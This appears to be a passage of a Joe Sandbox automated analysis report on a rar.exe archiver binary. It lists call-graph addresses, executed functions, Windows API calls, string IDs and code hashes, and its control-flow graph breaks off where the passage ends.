CreateFileW GetLastError 39526->39528 39526->39529 39530 7ff7d79e203a 39527->39530 39528->39529 39529->39524 39529->39525 39530->39473 39547 7ff7d79e24e8 39531->39547 39534 7ff7d79e240e 39534->39479 39536->39478 39537->39482 39539->39490 39540->39493 39541->39495 39542->39498 39543->39501 39544->39484 39545->39489 39553 7ff7d79e1af0 39547->39553 39550 7ff7d79e23f9 39550->39534 39552 7ff7d79dca40 61 API calls _CxxThrowException 39550->39552 39552->39534 39554 7ff7d79e1b01 setbuf 39553->39554 39555 7ff7d79e1b6f CreateFileW 39554->39555 39556 7ff7d79e1b68 39554->39556 39555->39556 39557 7ff7d79e1be1 39556->39557 39558 7ff7d79f4534 10 API calls 39556->39558 39561 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39557->39561 39559 7ff7d79e1bb3 39558->39559 39559->39557 39560 7ff7d79e1bb7 CreateFileW 39559->39560 39560->39557 39562 7ff7d79e1c14 39561->39562 39562->39550 39563 7ff7d79dca08 10 API calls 39562->39563 39563->39550 39564 7ff7d7a22450 39571 7ff7d7a23734 39564->39571 39566 7ff7d7a22455 39567 7ff7d7a26998 fflush LeaveCriticalSection 39566->39567 39568 7ff7d7a22460 39567->39568 39569 7ff7d7a2246c 39568->39569 39570 7ff7d7a22488 11 API calls 39568->39570 39570->39569 39576 7ff7d7a25630 35 API calls 3 library calls 39571->39576 39573 7ff7d7a2373f 39577 7ff7d7a24a1c 35 API calls abort 39573->39577 39576->39573 39578 7ff7d7a0bb70 39581 7ff7d7a0bb80 39578->39581 39590 7ff7d7a0bae8 39581->39590 39583 7ff7d7a0bb79 39585 7ff7d7a0bbc8 SetEvent 39586 7ff7d7a0bbd5 LeaveCriticalSection 39585->39586 39587 7ff7d7a0bae8 67 API calls 39586->39587 39588 7ff7d7a0bb97 39587->39588 39588->39583 39595 7ff7d79d1690 39588->39595 39591 7ff7d7a0b974 65 API calls 39590->39591 39592 7ff7d7a0bb09 39591->39592 39593 7ff7d7a0bb12 39592->39593 39594 7ff7d7a0bb16 EnterCriticalSection LeaveCriticalSection 39592->39594 39593->39588 39594->39593 39596 7ff7d79d16a4 39595->39596 39597 7ff7d79d16c2 EnterCriticalSection 39595->39597 39596->39597 39599 7ff7d79d1180 39596->39599 39597->39585 39597->39586 39600 7ff7d79d11ab 39599->39600 39605 7ff7d79d11b0 39599->39605 39609 7ff7d79d17c8 39600->39609 39602 7ff7d79d166a 39602->39596 39603 7ff7d79f6d38 216 API calls 39603->39605 39604 7ff7d79d1080 48 API calls 39604->39605 39605->39602 39605->39603 39605->39604 39606 7ff7d79f6fe8 216 API calls 39605->39606 39607 7ff7d79d17c8 216 API calls 39605->39607 39608 7ff7d79f6e90 216 API calls 39605->39608 39606->39605 39607->39605 39608->39605 39611 7ff7d79d1813 memcpy_s 39609->39611 39619 7ff7d79e8328 39611->39619 39612 7ff7d79f6fe8 216 API calls 39613 7ff7d79d192f 39612->39613 39613->39612 39618 7ff7d79d19db 39613->39618 39614 7ff7d79d1b27 39615 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39614->39615 39616 7ff7d79d1b33 39615->39616 39616->39605 39617 7ff7d79f6fe8 216 API calls 39617->39618 39618->39614 39618->39617 39620 7ff7d79e834c setbuf 39619->39620 39625 7ff7d79e81bc 39620->39625 39622 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39623 7ff7d79e853b 39622->39623 39623->39613 39624 7ff7d79e83ab memcpy_s 39624->39622 39628 7ff7d79e81d8 memcpy_s setbuf 39625->39628 39626 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39627 7ff7d79e830c 39626->39627 39627->39624 39628->39626 39629 7ff7d7a0a924 39631 7ff7d7a0a949 sprintf 39629->39631 39630 7ff7d7a0a97f CompareStringA 39631->39630 39632 7ff7d79c7a5b 39633 7ff7d79c7a60 39632->39633 39634 7ff7d79d9be0 14 API calls 39633->39634 39636 7ff7d79c7af7 39633->39636 39634->39636 39635 7ff7d79c7bda 39638 7ff7d79cb540 147 API calls 39635->39638 39636->39635 39665 7ff7d79e1e1c GetFileTime 39636->39665 39639 7ff7d79c7bf8 39638->39639 39642 7ff7d79c7c3e 39639->39642 39666 7ff7d7a19b98 216 API calls 3 library calls 39639->39666 39641 7ff7d79cb540 147 API calls 39644 7ff7d79c7c9c 39641->39644 39642->39641 39643 7ff7d79c7f89 39644->39643 39667 7ff7d79e6378 39644->39667 39646 7ff7d79c7cd7 39647 7ff7d79e6378 4 API calls 39646->39647 39649 7ff7d79c7cf3 39647->39649 39648 7ff7d79c7de1 39655 7ff7d79c7e4e 39648->39655 39672 7ff7d79f98dc 39648->39672 39649->39648 39651 7ff7d79c7d59 39649->39651 39652 7ff7d79c7d38 39649->39652 39654 7ff7d7a1a444 new 4 API calls 39651->39654 39653 7ff7d7a1a444 new 4 API calls 39652->39653 39659 7ff7d79c7d42 std::bad_alloc::bad_alloc 39653->39659 39654->39659 39678 7ff7d79c1204 48 API calls 39655->39678 39657 7ff7d79c7eb3 39660 7ff7d79c7edb 39657->39660 39679 7ff7d79f9680 39657->39679 39659->39648 39671 7ff7d7a1ba34 RtlPcToFileHeader RaiseException 39659->39671 39685 7ff7d79e6424 8 API calls _UnwindNestedFrames 39660->39685 39662 7ff7d79c7f56 39664 7ff7d79cb540 147 API calls 39662->39664 39664->39643 39665->39635 39666->39642 39668 7ff7d79e6396 39667->39668 39670 7ff7d79e63a0 39667->39670 39669 7ff7d7a1a444 new 4 API calls 39668->39669 39669->39670 39670->39646 39671->39648 39673 7ff7d79f9926 39672->39673 39674 7ff7d79f993c 39672->39674 39675 7ff7d79d90b8 75 API calls 39673->39675 39676 7ff7d79d90b8 75 API calls 39674->39676 39677 7ff7d79f9934 39675->39677 39676->39677 39677->39655 39678->39657 39683 7ff7d79f96a4 39679->39683 39680 7ff7d79f97d7 39681 7ff7d79e2574 126 API calls 39681->39683 39683->39680 39683->39681 39684 7ff7d7a19b98 216 API calls 39683->39684 39686 7ff7d79e6498 72 API calls new 39683->39686 39684->39683 39685->39662 39686->39683

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF7D79D54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                      • API String ID: 0-1628410872
                                                                                                                                                                      • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                      • Instruction ID: 8d86d23f41193366dd77571e65ff63bb6f21e4dd1e87cefd87c033e20419a918
                                                                                                                                                                      • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                      • Instruction Fuzzy Hash: 87C2B22390C19381EB64BF24818D1BDA6A1AF417D8FDD8437DA4E4B2CADE6DA547C370
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C1884 Relevance: 24.1, APIs: 5, Strings: 8, Instructions: 1374COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                      • API String ID: 0-1660254149
                                                                                                                                                                      • Opcode ID: 536486dfd579ff9ae80834c81cdf08dfd6669d860ad932a24ecd01010a181a58
                                                                                                                                                                      • Instruction ID: fb578db1b8e6690805e7a63c8e08ed93ceba76a154485982df84cee1bd7184a4
                                                                                                                                                                      • Opcode Fuzzy Hash: 536486dfd579ff9ae80834c81cdf08dfd6669d860ad932a24ecd01010a181a58
                                                                                                                                                                      • Instruction Fuzzy Hash: B4E28D27A09AC285EF20EB25D8401EDA7A1FB8578CFC94037DA4D4779ADF39D546CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A048CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                      • String ID: rarlng.dll
                                                                                                                                                                      • API String ID: 2520153904-1675521814
                                                                                                                                                                      • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                      • Instruction ID: 6ddbd3eb51142395f2c8ff551431545c594864f1a0d12d9c8211bcc7394be84e
                                                                                                                                                                      • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                      • Instruction Fuzzy Hash: A431723171864286FB68AF29E840AEDA760FB85785FC04437EA4D42698DF3CE546CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E46EC Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E4736
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E476B
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E477A
                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E47A4
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,00007FF7D79E4620,?,00000000,?,00007FF7D7A07A8C), ref: 00007FF7D79E47B2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 869497890-0
                                                                                                                                                                      • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                      • Instruction ID: 5bfe7be57d51eefb484a7c48ca2dae7f70e139c06bffa7e519955e83964d2f07
                                                                                                                                                                      • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                      • Instruction Fuzzy Hash: 6441B23270968256EA28AB29E5402EDA3A0FB497B8FC00332FB7D477D5DF6CD1568710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1815803762-0
                                                                                                                                                                      • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                      • Instruction ID: 6ff7f1419171d1fdc4e318ab3b9a29ebec05f3c59f006e500bd68f6c952d3ef0
                                                                                                                                                                      • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                      • Instruction Fuzzy Hash: A8016D26B0865182E744AB66E98472EA762EBC5FD0F988032DE4D47B68CF7DD9468700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79CB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Char
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 751630497-0
                                                                                                                                                                      • Opcode ID: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
                                                                                                                                                                      • Instruction ID: ac88a5fb7c6b3c66328c0c8bd89e3cfea07b425712fd1cf939e2e798fcab64bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f56d019d4e2a31f9ab4d26e2ca55949b143ab16f30f51743a8115627407802b
                                                                                                                                                                      • Instruction Fuzzy Hash: BF22A163A0869395EB54EF30D4412BEFBA0FB5074CFC84037DA8D56699CE78E952CB60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79EAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e858063f55ff5e09d9a0e8ca2757e04015df25f8ee771d14e1c0be3fa39aa8fd
                                                                                                                                                                      • Instruction ID: cb40a04b68efc95b742da9ae23be2af79fce4fcd609585824dfe8f646faded09
                                                                                                                                                                      • Opcode Fuzzy Hash: e858063f55ff5e09d9a0e8ca2757e04015df25f8ee771d14e1c0be3fa39aa8fd
                                                                                                                                                                      • Instruction Fuzzy Hash: 70712772B0568186E708EF29E4057EC7391F7C8B98F844136DF6D8B399DF78A05287A0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A03EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 635 7ff7d7a03ea8-7ff7d7a03f03 call 7ff7d7a1a5a0 call 7ff7d7a1c8a0 640 7ff7d7a03f05-7ff7d7a03f3e GetModuleFileNameW call 7ff7d79f4e14 call 7ff7d7a0a9c0 635->640 641 7ff7d7a03f40-7ff7d7a03f50 call 7ff7d7a0a9e8 635->641 645 7ff7d7a03f55-7ff7d7a03f79 call 7ff7d79e1874 call 7ff7d79e1e80 640->645 641->645 652 7ff7d7a04692-7ff7d7a046c5 call 7ff7d79e18ac call 7ff7d7a1a610 645->652 653 7ff7d7a03f7f-7ff7d7a03f89 645->653 654 7ff7d7a03fae-7ff7d7a03feb call 7ff7d7a1ec70 * 2 653->654 655 7ff7d7a03f8b-7ff7d7a03fac call 7ff7d7a011c0 * 2 653->655 668 7ff7d7a03fef-7ff7d7a03ff3 654->668 655->654 669 7ff7d7a040f2-7ff7d7a04112 call 7ff7d79e22e0 call 7ff7d7a1eb90 668->669 670 7ff7d7a03ff9-7ff7d7a0402d call 7ff7d79e2440 call 7ff7d79e2150 668->670 669->652 681 7ff7d7a04118-7ff7d7a04131 call 7ff7d79e2150 669->681 679 7ff7d7a04033 670->679 680 7ff7d7a040bc-7ff7d7a040e2 call 7ff7d79e22e0 670->680 682 7ff7d7a0403a-7ff7d7a0403e 679->682 680->668 692 7ff7d7a040e8-7ff7d7a040ec 680->692 689 7ff7d7a04133-7ff7d7a04136 681->689 690 7ff7d7a04138-7ff7d7a0414b call 7ff7d7a1eb90 681->690 685 7ff7d7a04064-7ff7d7a04069 682->685 686 7ff7d7a04040-7ff7d7a04044 682->686 693 7ff7d7a0406b-7ff7d7a04070 685->693 694 7ff7d7a04097-7ff7d7a0409f 685->694 686->685 691 7ff7d7a04046-7ff7d7a0405e call 7ff7d7a22290 686->691 697 7ff7d7a0416f-7ff7d7a041b1 call 7ff7d7a0a900 call 7ff7d7a1eb90 689->697 690->652 706 7ff7d7a04151-7ff7d7a0416c call 7ff7d7a0d54c call 7ff7d7a1eb88 690->706 707 7ff7d7a040a3-7ff7d7a040a7 691->707 708 7ff7d7a04060 691->708 692->652 692->669 693->694 700 7ff7d7a04072-7ff7d7a04078 693->700 695 7ff7d7a040a1 694->695 696 7ff7d7a040b7 694->696 695->682 696->680 718 7ff7d7a041b3-7ff7d7a041bb call 7ff7d7a1eb88 697->718 719 7ff7d7a041c0-7ff7d7a041d5 697->719 704 7ff7d7a04093 700->704 705 7ff7d7a0407a-7ff7d7a04091 call 7ff7d7a21700 700->705 704->694 705->704 716 7ff7d7a040a9-7ff7d7a040b5 705->716 706->697 707->696 708->685 716->680 718->652 720 7ff7d7a045f0-7ff7d7a04624 call 7ff7d7a03884 call 7ff7d7a1eb88 * 2 719->720 721 7ff7d7a041db 719->721 755 7ff7d7a04626-7ff7d7a04648 call 7ff7d7a011c0 * 2 720->755 756 7ff7d7a0464a-7ff7d7a04691 call 7ff7d7a1ec70 * 2 720->756 725 7ff7d7a041e1-7ff7d7a041ee 721->725 727 7ff7d7a041f4-7ff7d7a041fa 725->727 728 7ff7d7a04508-7ff7d7a04513 725->728 731 7ff7d7a041fc-7ff7d7a04202 727->731 732 7ff7d7a04208-7ff7d7a0420e 727->732 728->720 730 7ff7d7a04519-7ff7d7a04523 728->730 735 7ff7d7a04585-7ff7d7a04589 730->735 736 7ff7d7a04525-7ff7d7a0452b 730->736 731->728 731->732 737 